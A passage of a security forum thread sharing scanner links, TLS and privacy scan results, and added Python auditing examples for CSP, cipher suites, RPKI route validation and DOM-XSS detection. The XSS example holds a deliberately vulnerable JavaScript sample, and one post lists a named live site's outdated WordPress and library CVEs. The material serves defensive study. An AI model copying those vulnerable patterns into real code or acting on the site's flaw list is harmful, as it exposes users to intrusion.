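    if "object-src" not in d and "default-src" not in d:
        findings.append(("error", "object-src",
                         "missing; plugins could run script, set object-src 'none'"))
    if "base-uri" not in d:
        findings.append(("warn", "base-uri",
                         "missing; an injected <base> can redirect relative script URLs"))
    return findings


def missing_headers(headers):
    """Names from RECOMMENDED that the (case-insensitive) response headers do not provide."""
    present = {k.lower() for k in headers}
    if "feature-policy" in present:
        present.add("permissions-policy")
    csp = next((v for k, v in headers.items() if k.lower() == "content-security-policy"), "")
    if "frame-ancestors" in parse_csp(csp):
        present.add("x-frame-options")
    return [h for h in RECOMMENDED if h not in present]


def has_errors(findings):
    return any(sev == "error" for sev, _, _ in findings)


if __name__ == "__main__":
    for sev, directive, msg in audit_csp(WEAK_CSP):
        print(f"[{sev}] {directive}: {msg}")
    print("strict policy has errors:", has_errors(audit_csp(STRICT_CSP)))
    print("missing headers:", missing_headers(SAMPLE_HEADERS))
```

Feed `missing_headers` the dict from `requests.head(url).headers` (or from the Network tab) and `audit_csp` the Content-Security-Policy value, and you get the same two lists the online scanners show without sending the URL to a third party.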
Title: Re: Tests and other Media topics
Post by: polonus on March 30, 2020, 02:38:09 PM
Mozilla will bring https-only-mode to Firefox 76.
Read: https://bugzilla.mozilla.org/show_bug.cgi?id=1613063
So test here: https://www.cdn77.com/tls-test
or using tools found here: https://geekflare.com/ssl-test-certificate/

See https-everywhere atlas: https://atlas.eff.org
The static site generator for https-everywhere to be found here: https://github.com/EFForg/https-everywhere-atlas

And accompanying browser cookie dilemmas:
https://nakedsecurity.sophos.com/2015/02/02/anatomy-of-a-browser-dilemma-how-hsts-supercookies-make-you-choose-between-privacy-or-security/

Scan: https://webcookies.org/  &  https://securityheaders.com/?q=

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on April 13, 2020, 02:23:23 PM
The privacy implications of visiting some social media site?
Are we aware of what data we will share with Big Surveillance Data Grab Corporations?

Random example: https://webcookies.org/cookies/www.reddit.com/2247338
1st party cookies 7, css 1 for *reddit.com and 1 script;
*reddit.media.com  with 1 image;
*redditstatic.com css 5, 23 scripts and 1 other.
Consider: http://ssl-checker.online-domain-tools.com/
Quote
The results for host reddit.com (IP address 151.101.193.140) on port 443:

Problems Summary
BEAST vulnerability (CVE-2011-3389) is NOT mitigated on server.
Certificate Chain
Main Server Certificate
Subject Name:   *.reddit.com
Subject Data:   O=Reddit Inc., L=San Francisco, S=California, C=US
Alternative Names:   *.reddit.com, reddit.com
Prefix Handling:   Yes (with and without www)
Valid From:   2020-04-06 00:00:00 UTC
Valid To:   2020-10-03 12:00:00 UTC (expires in 6 months)
Key:   RSA 2048 bits (e 65537)
Signature Algorithm:   SHA256withRSA
Fingerprint:   4f476c62b996aaddf5d37b746f9953fc0e9db2d9
Issuer Name:   DigiCert SHA2 Secure Server CA
Issuer Data:   O=DigiCert Inc, C=US
Extended Validation:   No
Certificate Transparency:   Yes
Revocation Information:   OCSP, CRL
Revocation Status:   Not revoked
Weak Debian Key:   No
Self-signed:   No
Trusted:   Yes (Apple, Java, Microsoft, Mozilla)
Chain Certificate #2
Subject Name:   DigiCert SHA2 Secure Server CA
Subject Data:   O=DigiCert Inc, C=US
Valid To:   2023-03-08 12:00:00 UTC (expires in 2 years)
Key:   RSA 2048 bits (e 65537)
Signature Algorithm:   SHA256withRSA
Fingerprint:   1fb86b1168ec743154062e8c9cc5b171a4b7ccb4
Issuer Name:   DigiCert Global Root CA
Issuer Data:   O=DigiCert Inc, OU=www.digicert.com, C=US
Revocation Status:   Not revoked
Weak Debian Key:   No
Self-signed:   No
Certificate Paths
Path #1 (TRUSTED)
1   Sent by server
*.reddit.com
4f476c62b996aaddf5d37b746f9953fc0e9db2d9
RSA 2048 bits / SHA256withRSA
2   Sent by server
DigiCert SHA2 Secure Server CA
1fb86b1168ec743154062e8c9cc5b171a4b7ccb4
RSA 2048 bits / SHA256withRSA
3   In trust store
DigiCert Global Root CA (self-signed)
a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436
RSA 2048 bits / SHA1withRSA
Protocol Details
Details
Secure Renegotiation   Unknown
Secure Client-Initiated Renegotiation   Unknown
Insecure Client-Initiated Renegotiation   Unknown
OCSP Stapling   Yes
Strict Transport Security (HSTS)   Yes
Session Resumption (Session IDs)   Yes
Session Resumption (Session Tickets)   Yes
Deflate Compression   No
Downgrade Attack Prevention (TLS_FALLBACK_SCSV)   Yes
Supports Insecure Ciphers   No
Supports Weak Ciphers   No
Common DH Prime   No
Forward Secrecy   Yes
BREACH Vulnerability   No
CRIME Vulnerability   No
OpenSSL CCS Injection   No
Heartbleed Vulnerability   No
POODLE Vulnerability   No
BEAST Vulnerability   Yes
FREAK Vulnerability   No
LOGJAM Vulnerability   No
Supported Protocols and Cipher Suites
TLS 1.2
Supported   Yes
Cipher Suite   Grade   KeySize   FS   Export   Anon   Preferred
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (0xc02f)   Secure   128   Yes   No   No   Yes
TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (0xc030)   Secure   256   Yes   No   No   No
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xc014)   Secure   256   Yes   No   No   No
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (0xc028)   Secure   256   Yes   No   No   No
TLS_RSA_WITH_AES_256_CBC_SHA (0x35)   Secure   256   No   No   No   No
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013)   Secure   128   Yes   No   No   No
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (0xc027)   Secure   128   Yes   No   No   No
TLS_RSA_WITH_AES_128_GCM_SHA256 (0x9c)   Secure   128   No   No   No   No
TLS_RSA_WITH_AES_128_CBC_SHA (0x2f)   Secure   128   No   No   No   No
TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x0a)   Secure   112   No   No   No   No
TLS 1.1
Supported   Yes
Cipher Suite   Grade   KeySize   FS   Export   Anon   Preferred
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013)   Secure   128   Yes   No   No   Yes
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xc014)   Secure   256   Yes   No   No   No
TLS_RSA_WITH_AES_256_CBC_SHA (0x35)   Secure   256   No   No   No   No
TLS_RSA_WITH_AES_128_CBC_SHA (0x2f)   Secure   128   No   No   No   No
TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x0a)   Secure   112   No   No   No   No
TLS 1.0
Supported   Yes
Cipher Suite   Grade   KeySize   FS   Export   Anon   Preferred
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013)   Secure   128   Yes   No   No   Yes
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xc014)   Secure   256   Yes   No   No   No
TLS_RSA_WITH_AES_256_CBC_SHA (0x35)   Secure   256   No   No   No   No
TLS_RSA_WITH_AES_128_CBC_SHA (0x2f)   Secure   128   No   No   No   No
TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x0a)   Secure   112   No   No   No   No
SSL 3
Supported   No
SSL 2
Supported   No

Then see: https://urlscan.io/result/7604b6e3-3cb7-4ea1-a6e4-47f28d78fb76
Hosting with reCAPTCHA: https://www.shodan.io/host/151.101.117.140/raw

100% of the trackers on this site could be protecting you from NSA snooping for *redditstatic.com,
not secure against snoopers: https://webcookies.org/cookies/www.redditstatic.com/18587196

Security capped at F-status: https://observatory.mozilla.org/analyze/www.reddit.com

Not an ideal situation friends during lock-down Big Brother surveillance out-time, just come and realize these facts.

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
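Reading a cipher-suite table like the one above by hand is error-prone, so here is an added example (mine, not output or code from the scanner linked in the post) that takes the suites a scan reports per protocol and flags what that table is hiding in plain sight: TLS 1.0/1.1 still enabled, CBC suites on TLS 1.0 (the BEAST condition, CVE-2011-3389), 3DES (SWEET32, CVE-2016-2183) and RSA key exchange without forward secrecy. The sample scan is a constructed subset of the reddit.com table; function names are assumptions.

```python
# Constructed subset of the scan quoted above: protocol -> suites the server accepted.
SAMPLE_SCAN = {
    "TLS 1.2": ["TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256", "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA",
                "TLS_RSA_WITH_AES_256_CBC_SHA", "TLS_RSA_WITH_AES_128_GCM_SHA256",
                "TLS_RSA_WITH_3DES_EDE_CBC_SHA"],
    "TLS 1.1": ["TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA", "TLS_RSA_WITH_3DES_EDE_CBC_SHA"],
    "TLS 1.0": ["TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA", "TLS_RSA_WITH_AES_128_CBC_SHA"],
    "SSL 3": [],
}
# A configuration that produces no findings: TLS 1.3 plus AEAD-only TLS 1.2 with ECDHE.
CLEAN_SCAN = {
    "TLS 1.3": ["TLS_AES_128_GCM_SHA256", "TLS_CHACHA20_POLY1305_SHA256"],
    "TLS 1.2": ["TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
                "TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"],
}
DEPRECATED = {"SSL 2", "SSL 3", "TLS 1.0", "TLS 1.1"}   # RFC 8996 retired TLS 1.0 and 1.1
INSECURE_TOKENS = ("_NULL_", "_EXPORT", "_RC4_", "_anon_", "_DES_CBC_", "_MD5")


def forward_secret(suite):
    """Ephemeral (EC)DH key exchange; every TLS 1.3 suite is ephemeral by construction."""
    return ("_ECDHE_" in suite or "_DHE_" in suite
            or suite.startswith("TLS_AES_") or suite.startswith("TLS_CHACHA20_"))


def grade_scan(scan):
    """Return (severity, protocol, suite, message) findings for an accepted-suite table."""
    findings = []
    for proto, suites in scan.items():
        if suites and proto in DEPRECATED:
            findings.append(("high", proto, "*",
                             f"{proto} still enabled; disable it, clients have TLS 1.2+"))
        for suite in suites:
            if any(tok in suite for tok in INSECURE_TOKENS):
                findings.append(("high", proto, suite, "broken cipher or key exchange"))
            if "3DES" in suite:
                findings.append(("medium", proto, suite,
                                 "64-bit block cipher, SWEET32 (CVE-2016-2183)"))
            if "_CBC_" in suite and proto == "TLS 1.0":
                # BEAST is a client-side chosen-plaintext attack on TLS 1.0 CBC; browsers
                # mitigate it with 1/n-1 record splitting, the server-side fix is dropping TLS 1.0.
                findings.append(("medium", proto, suite,
                                 "CBC on TLS 1.0, BEAST condition (CVE-2011-3389)"))
            if not forward_secret(suite):
                findings.append(("low", proto, suite,
                                 "static RSA key exchange, no forward secrecy"))
    return findings


def worst_severity(findings):
    order = {"high": 3, "medium": 2, "low": 1}
    return max((f[0] for f in findings), key=order.get, default="none")


if __name__ == "__main__":
    for sev, proto, suite, msg in grade_scan(SAMPLE_SCAN):
        print(f"{sev:6} {proto:8} {suite:45} {msg}")
    print("worst:", worst_severity(grade_scan(SAMPLE_SCAN)))
```

On the "BEAST vulnerability is NOT mitigated on server" line in the scan: the only server-side "mitigation" scanners used to credit was preferring RC4, which is worse than the attack it avoids, so the finding to act on is the TLS 1.0 one, not a cipher-order change.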



Title: Re: Tests and other Media topics
Post by: polonus on April 18, 2020, 09:33:55 PM
Test Border Gateway Protocol for safety here: https://isbgpsafeyet.com/
Why important?
A BGP hijack occurs when a malicious node deceives another node, lying about what the routes are for its neighbors. Without any security protocols, this misinformation can propagate from node to node, until a large number of nodes now know about, and attempt to use these incorrect, nonexistent, or malicious routes.

For BGP to be safe, all of the major ISPs will need to embrace RPKI. Sharing this page will increase awareness of the problem which can ultimately pressure ISPs into implementing RPKI for the good of themselves and the general public. You can also reach out to your service provider or hosting company directly and ask them to deploy RPKI and join MANRS. When the Internet is safe, everybody wins.

Implementing: https://blog.cloudflare.com/cloudflares-rpki-toolkit/

polonus
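What isbgpsafeyet.com tests is whether your provider drops routes that RPKI marks invalid. The decision itself (RFC 6811 route origin validation) is small enough to show, so here is an added example written for this post, not Cloudflare's toolkit or any router's implementation: it validates announced (prefix, origin AS) pairs against a constructed set of validated ROA payloads and applies the "drop invalids" policy. The ROAs use documentation prefixes and private AS numbers chosen as assumptions.

```python
import ipaddress

# Constructed VRPs (validated ROA payloads): (prefix, maxLength, origin ASN).
VRPS = [
    ("192.0.2.0/24", 24, 64496),
    ("198.51.100.0/22", 24, 64497),   # holder may announce the /22 or any /23, /24 inside it
    ("203.0.113.0/24", 24, 0),        # AS0 ROA: nobody may originate this prefix
    ("2001:db8::/32", 48, 64496),
]


def covering_vrps(vrps, prefix):
    """VRPs whose prefix contains the announced prefix (same address family)."""
    net = ipaddress.ip_network(prefix, strict=True)
    out = []
    for vprefix, maxlen, asn in vrps:
        vnet = ipaddress.ip_network(vprefix, strict=True)
        if vnet.version == net.version and net.subnet_of(vnet):
            out.append((vnet, maxlen, asn))
    return out


def validate_route(vrps, prefix, origin_asn):
    """RFC 6811: 'notfound' if no VRP covers the prefix; 'valid' if a covering VRP matches the
    origin AS and the prefix is no longer than maxLength; otherwise 'invalid'."""
    net = ipaddress.ip_network(prefix, strict=True)
    covering = covering_vrps(vrps, prefix)
    if not covering:
        return "notfound"
    for _, maxlen, asn in covering:
        # AS0 never matches a real origin, so an AS0 ROA makes every announcement invalid.
        if asn != 0 and asn == origin_asn and net.prefixlen <= maxlen:
            return "valid"
    return "invalid"


def accept_route(vrps, prefix, origin_asn):
    """The policy isbgpsafeyet.com looks for: reject invalid, keep valid and notfound."""
    return validate_route(vrps, prefix, origin_asn) != "invalid"


if __name__ == "__main__":
    announcements = [
        ("192.0.2.0/24", 64496),      # legitimate
        ("192.0.2.0/25", 64496),      # more-specific beyond maxLength: invalid even from the owner
        ("192.0.2.0/24", 64500),      # origin hijack
        ("198.51.100.0/24", 64497),   # covered by the /22 ROA with maxLength 24
        ("203.0.113.0/24", 64498),    # AS0 ROA
        ("10.0.0.0/8", 64496),        # no ROA at all
    ]
    for prefix, asn in announcements:
        state = validate_route(VRPS, prefix, asn)
        print(f"{prefix:18} AS{asn:<6} {state:9} {'accept' if accept_route(VRPS, prefix, asn) else 'drop'}")
```

Note the second case: a ROA with a tight maxLength makes the holder's own more-specifics invalid, which is the intended protection against the classic "announce a /25 to win the longest-match" hijack, but also why a loose maxLength (say /24 on a /16 ROA) protects very little.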
Title: Re: Tests and other Media topics
Post by: polonus on April 19, 2020, 03:28:40 PM
To monitor my connections I run Nir Sofer's SmartSniff tool.
Example:
3676   TCP   192.168.U.UU   172.217.17.131   49430   443      -gstaticadssl.l.google.com   https   75  {75 ; 0}   44.304 Bytes  {44.304 ; 0}   47.861 Bytes  {47.304 ; 557}   26.4 KB/Sec   19-4-2020 15:09:34:PPP   19-4-2020 15:09:35:PPP   00:00:01.6VV   XX-xx-xx-xx-xx-xx   zz-zz-zz-zz-zz-zz   (blurred with UPVx&z by me, pol)

Checked here:    https://ipinfolookup.com/172.217.17.36   &  here:  https://www.shodan.io/host/172.217.17.36
& https://www.shodan.io/host/172.217.17.36/raw 
Consider also: https://www.lookip.net/ip/172.217.17.36   &   https://ipinfo.io/172.217.17.36
Discussion here (TTL value related) https://github.com/googlehosts/hosts/issues/321
and https://www.site24x7.com/public/t/results-1577438856577.html    and   https://db-ip.com/all/172.217.17 (Spain,
but actually I connected here: https://db-ip.com/172.217.17.36     =    ams16s29-in-f4.1e100.net

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on April 19, 2020, 03:40:58 PM
My connections are monitored by Avast Omni (https://www.avast.com/en-us/omni#omni). :)
Title: Re: Tests and other Media topics
Post by: polonus on April 19, 2020, 07:40:26 PM
Not arguing with that, bob3160, but that is an all purpose tool, and I am just talking checking on IP connections here.
Re: https://www.projecthoneypot.org/list_of_ips.php
This IP not detected: 69.30.232.50 but flagged here: https://maltiverse.com/ip/69.30.232.50 Spammer
Another one: https://www.fortypoundhead.com/tools_ipcheck.asp
Also good to detect mail policy rule breakers: https://www.abusix.ai/search?q=104.31.75.87
Compare with: https://www.projecthoneypot.org/ip_104.31.75.87

polonus



Title: Re: Tests and other Media topics
Post by: polonus on April 20, 2020, 10:12:17 PM
About combining resources.
Agent Tesla - in the news:
https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/
Example: https://urlhaus.abuse.ch/url/346766/
On IP: https://www.shodan.io/host/95.163.208.51
Only spamhaus to detect: https://www.virustotal.com/gui/url/16575df43aa87b759e35647d0bfa6779b6f603944d8be878f4ea3ef61d8961f3/detection
Detections: https://www.virustotal.com/gui/ip-address/95.163.208.51/relations
Information resource: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
and so we have closed this combining resources cycle back to where we have begun.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 23, 2020, 03:40:18 PM
YARA -> read: https://yara.readthedocs.io/en/stable/index.html
and https://virustotal.github.io/yara/  (page is temp. down for maintenance)...
Resources with YARA rules: https://capesandbox.com/analysis/1118/
and
https://malpedia.caad.fkie.fraunhofer.de/

Non-public part: https://github.com/malpedia/feedback/issues
Also, please be aware that not all content on Malpedia is publicly available.
More specifically, you will need an account to access all data (malware samples, non-public YARA rules, ...).
In this regard, Malpedia is operated as an invite-only trust group.

And: https://valhalla.nextron-systems.com/  ->  support.knowbe4.com  & cythereal/threat-intelligence

YARA on VirusTotal: https://support.virustotal.com/hc/en-us/articles/115002178945-YARA
Read: https://securityintelligence.com/signature-based-detection-with-yara/

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on April 23, 2020, 10:02:11 PM
Just starting from an abuse IP and further accompanying info
we could analyze for instance a global intrusion campaign by APT41 state actors below.

Re: https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
blog info on a particular abuse of CITRIX server flaw.
Found in this database: https://www.abuseipdb.com/check/66.42.98.220
and analyzed here: https://www.joesandbox.com/analysis/214068/0/html  (impressive)....
Consider also what was being abused: https://exploits.shodan.io/?q=Citrix

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 25, 2020, 12:00:21 AM
Yara rule example -> https://capesandbox.com/analysis/2115/
Consider: https://github.com/godaddy/yara-rules/blob/master/emotet.yara
and read: https://blog.malwarebytes.com/security-world/technology/2017/09/explained-yara-rules/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 25, 2020, 12:24:46 PM
L.S.

Now combining this with starting from a known malicious or suspicious IP.
Random example from Mainland China: https://www.abuseipdb.com/check/58.221.84.90
& https://www.shodan.io/host/58.221.84.90  &  malicious host: https://maltiverse.com/ip/58.221.84.90
where we always should check: https://www.virustotal.com/gui/url/340dbe0113dfca01b3d129e4d04438f65b3117b6fabb5a6f973aadee04cf1d5c/detection
& https://www.virustotal.com/gui/ip-address/58.221.84.90/relations
Trackers from at least 1 third party know you are on this webpage:
-mail.hhitcloud.cn -> https://webhint.io/scanner/8d88c85a-5e9c-4101-a7c1-cb94db17e185
Netcraft risk status - 10 red out of 10: https://sitereport.netcraft.com/?url=http%3A%2F%2Fmail.hhitcloud.cn
Listed and blocked as with Hackers, Spyware, Botnets etc.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 25, 2020, 02:56:59 PM
SSH BruteForce attacker, scanner -> https://www.abuseipdb.com/check/188.166.147.211
Re host: https://www.shodan.io/host/188.166.147.211
See: https://viz.greynoise.io/ip/188.166.147.211
Consider info: https://report.cs.rutgers.edu/mrtg/drop/dropstat.cgi?start=-1d
Protection -> https://www.badips.com/  from the abuse tracker's mouth: https://www.badips.com/info

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on April 25, 2020, 10:01:10 PM
We used to have these threats included on various online website scanners.
That is why we are missing this site: https://archive.is/urlquery.net
https://rules.emergingthreats.net/
Example of category: https://rules.emergingthreats.net/fwrules/emerging-Block-IPs.txt
Oisf-users Archive: https://lists.openinfosecfoundation.org/pipermail/oisf-users/  (Suricata rules)

pol
Title: Re: Tests and other Media topics
Post by: polonus on April 26, 2020, 07:13:57 PM
Example of a Trickbot EXE analysis comparison from various (re)sources:
Regex examples: https://nullsecure.org/malware-traffic-analysis-using-splunk/
On pastebin: https://pastebin.com/6U27ZZd3
On capesandbox: https://capesandbox.com/analysis/1628/
On a particular trickbot IP: https://www.abuseipdb.com/check/107.172.236.237
Similar: https://urlhaus.abuse.ch/url/347024/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 27, 2020, 12:35:53 AM
Normally you do not get the following info directly from inside the webbrowser.

So we opened up Ctrl+Shift+I (developer console information)
together with a run of the Quick Source Viewer extension to get:

Quote
  js flexbox canvas canvastext webgl no-touch geolocation postmessage websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths">
<

&
Quote
INLINE: (function() { let alreadyInsertedMetaTag = false function __insertDappDete
1,238 bytes

INLINE: var script_urls = '["-https://static.shodan.io/jquery/js/jquery.js", "https:
245 bytes

INLINE: (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i
&
On CSS-5
Quote
INJECTED

INLINE: :root #content > #right > .dose > .dosesingle, :root #content > #center > .dose
120 bytes INJECTED

INLINE: @media print {#ghostery-purple-box {display:none !important}}
61 bytes INJECTED
What we scanned -> Results from scanning URL: -https://cdn.maptiler.com/mapbox-gl-js/v0.53.0/mapbox-gl.js
Number of sources found: 25
Number of sinks found: 2
Quote
HTML
-static.shodan.io/bootstrap/js/bootstrap.min.js
26,015 bytes, 41 nodes

Javascript 1   (external 0, inline 1)
INLINE: (function() { let alreadyInsertedMetaTag = false function __insertDappDete
1,238 bytes

CSS 1   (external 0, inline 1)
INLINE: @media print {#ghostery-purple-box {display:none !important}}
61 bytes INJECTED

Tips
Quote
Shows current sources in the DOM.
"INJECTED" nodes have been injected to DOM by Javascript after initial page load.
Press B to toggle beautifier.
Press N to toggle line numbers.
Adjust options of this extension.

All valuable information as we start to analyze website code or script vulnerabilities (flaws),

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
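The "Number of sources found / Number of sinks found" lines in that Quick Source Viewer output are DOM XSS terms: a source is attacker-influenced input (location.hash, document.referrer, window.name, postMessage data), a sink is an API that turns a string into markup or code (innerHTML, document.write, eval). The script below is an added example, not code from the extension or from any site named above: it counts both in a constructed JavaScript sample and flags statements where a source flows straight into a sink. The patterns and the sample are my assumptions, and a same-statement match is a heuristic, not taint tracking.

```python
import re

# Constructed JavaScript sample (not taken from any site in the thread).
SAMPLE_JS = """
var q = location.hash.slice(1);
document.getElementById('out').innerHTML = decodeURIComponent(q);
window.addEventListener('message', function (e) { box.innerHTML = e.data; });
document.write('<p>Came from ' + document.referrer + '</p>');
var txt = document.createTextNode(location.search);
eval('config = ' + window.name);
setTimeout(function () { counter++; }, 1000);
"""

SOURCES = {
    "location": r"\blocation\.(?:hash|search|href|pathname)\b",
    "document": r"\bdocument\.(?:URL|documentURI|referrer|cookie)\b",
    "window.name": r"\bwindow\.name\b",
    "postMessage": r"addEventListener\(\s*['\"]message['\"]",
}
SINKS = {
    "innerHTML": r"\.(?:innerHTML|outerHTML)\s*=",
    "insertAdjacentHTML": r"\.insertAdjacentHTML\(",
    "document.write": r"\bdocument\.write(?:ln)?\(",
    "eval": r"\beval\(|\bnew\s+Function\(",
    "string timer": r"\bset(?:Timeout|Interval)\(\s*['\"]",
    "jQuery html": r"\.html\(|\.append\(",
}


def find_matches(patterns, text):
    """name -> number of occurrences of each regex in the text."""
    return {name: len(re.findall(rx, text)) for name, rx in patterns.items()}


def scan_js(text):
    """Counts plus the statements where a source and a sink appear together."""
    sources = find_matches(SOURCES, text)
    sinks = find_matches(SINKS, text)
    suspicious = []
    for line in text.splitlines():
        has_source = any(re.search(rx, line) for rx in SOURCES.values())
        has_sink = any(re.search(rx, line) for rx in SINKS.values())
        if has_source and has_sink:
            suspicious.append(line.strip())
    return {
        "sources": sum(sources.values()),
        "sinks": sum(sinks.values()),
        "by_source": sources,
        "by_sink": sinks,
        "suspicious": suspicious,
    }


if __name__ == "__main__":
    report = scan_js(SAMPLE_JS)
    print(f"Number of sources found: {report['sources']}")
    print(f"Number of sinks found: {report['sinks']}")
    for stmt in report["suspicious"]:
        print("  source -> sink in one statement:", stmt)
```

Line 2 of the sample is the case the heuristic misses on purpose: the hash goes through a variable first, so confirming that flow needs the debugger (a breakpoint on the innerHTML setter) rather than grep.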
Title: Re: Tests and other Media topics
Post by: polonus on April 29, 2020, 04:05:30 PM
Interaction of two online resources (malpedia & URLhaus).
Buzzword RATs and in particular Mozi: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mozi
and https://urlhaus.abuse.ch/browse/
Read article: https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848
No existing YARA rule for Mozi, -> https://www.joesandbox.com/search?q=Mozi.m
particular example: https://www.joesandbox.com/analysis/343770
Re: https://www.joesandbox.com/analysis/223570/0/pdf
See: https://urlhaus.abuse.ch/browse.php?search=162.212.114.3
link to https://www.shodan.io/host/162.212.114.3 and then to https://viz.greynoise.io/ip/162.212.114.3
Scans for port 2323 -> As it's well known that port 23 is very vulnerable, some people try to be "tricky" and use port 2323 for the same purpose as port 23. It's a very lazy solution and hackers know about this, that's why they usually scan this port too.

polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on April 29, 2020, 09:47:03 PM
While reading this blog post at ZScaler's, I landed here to test
what has been kicked up through the Quick Source extension inside Google Chrome.

To fuzz inline scripts using this online tool: https://closure-compiler.appspot.com/home

After compiling I got "JSC_PARSE_ERROR: Parse error. In some cases, '<!--' and '-->' are treated as a '//' for legacy reasons. Removing this from your code is safe for all browsers currently in use. at line 5 character 19"
then delivering this OUTPUT of default.js
Quote
output_file_name=default.js
&js_code=%2F%2F%20ADD%20YOUR%20CODE%20HERE%0Afunction%20hello(name)%20%7B%0A%20%20alert('Hello%2C%20'%20%2B%20name)%3B%0A%7D%0Ahello('New%20user')%3B%20%3C!--%20%2F%2F%20--%3E%3C!%5BCDATA%5B%0 etc. etc. etc.
  Gaining quite some insights in the field of JavaScript analysis.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 02, 2020, 03:38:01 PM
Not malicious but here in the Hall of Shame:
Re: https://www.immuniweb.com/websec/?id=ZZv4yeuM
and https://urlscan.io/result/d73751bc-be77-4834-bc8a-b7089f662801
on hoster: https://www.shodan.io/host/88.99.247.221
Insecure:
Quote
This website is insecure.
33% of the trackers on this site could be protecting you from NSA snooping. Tell -koliee.ir to fix it.

Identifiers | All Trackers
* Insecure Identifiers
Unique IDs about your web browsing habits have been insecurely sent to third parties.

-7ocilktl9nkh7ihXXXXXXcebb0 -wXw.koliee.ir phpsessid

Retireable jQuery libraries:
Quote
bootstrap   3.3.7   Found in -http://www.koliee.ir/js/bootstrap.min.js
Vulnerability info: **
High   28236 XSS in data-template, data-content and data-title properties of tooltip/popover CVE-2019-8331   
Medium   20184 XSS in data-target property of scrollspy CVE-2018-14041   
Medium   20184 XSS in collapse data-parent attribute CVE-2018-14040   
Medium   20184 XSS in data-container property of tooltip CVE-2018-14042   
jquery   3.2.1.min   Found in -http://www.koliee.ir/js/jquery-3.2.1.min.js
Vulnerability info:
Low   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   123
Medium   Regex in its jQuery.htmlPrefilter sometimes may introduce XSS
Blocked in the browser for me (pol): -www.smartsuppchat.com/​loader.js?
INLINE: (function() { let alreadyInsertedMetaTag = false function __insertDappDete
1,238 bytes

INLINE: var _smartsupp = _smartsupp || {}; _smartsupp.key = '00ff41XXXXXXXXXX54e1b6ae86
418 bytes

** bootstrap insecurity: -www.koliee.ir/css/​bootstrap.min.css
INJECTED

INLINE: @media print {#ghostery-purple-box {display:none !important}}
61 bytes INJECTED

font insecurity version 4.7.0

linting report hints:  https://webhint.io/scanner/52b964c6-33f6-497e-b75d-1a569424149c
and especially here for this forum the 9 category of hints here:
https://webhint.io/scanner/52b964c6-33f6-497e-b75d-1a569424149c#category-security

for instance disown-opener flaw for -http://koliee.ir/blog/1395/07/20/%D9%85%D8%AF%D8%A7%D8%B1%DA%A9-%D9%84%D8%A7%D8%B2%D9%85-%D8%AC%D9%87%D8%AA-%D8%A7%D9%87%D8%AF%D8%A7%D8%A1-%DA%A9%D9%84%DB%8C%D9%87/

Word Press vuln. Wordpress - 4.6.18
7.5
WPVDB-ID:8941
WordPress <= 4.8.2 - $wpdb->prepare() Weakness
7.5
WPVDB-ID:10004
WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
7.5
WPVDB-ID:9912
WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation
7.5
WPVDB-ID:9171
WordPress <= 5.0 - PHP Object Injection via Meta Data
7.5
WPVDB-ID:8730
WordPress 3.5-4.7.1 - WP_Query SQL Injection
7.5
WPVDB-ID:8905
WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
7.5
WPVDB-ID:8818
WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
6.8
WPVDB-ID:8720
WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
6.8
WPVDB-ID:9230
WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
6.8
WPVDB-ID:9913
WordPress <= 5.2.3 - Admin Referrer Validation
6.8
WPVDB-ID:8969
WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
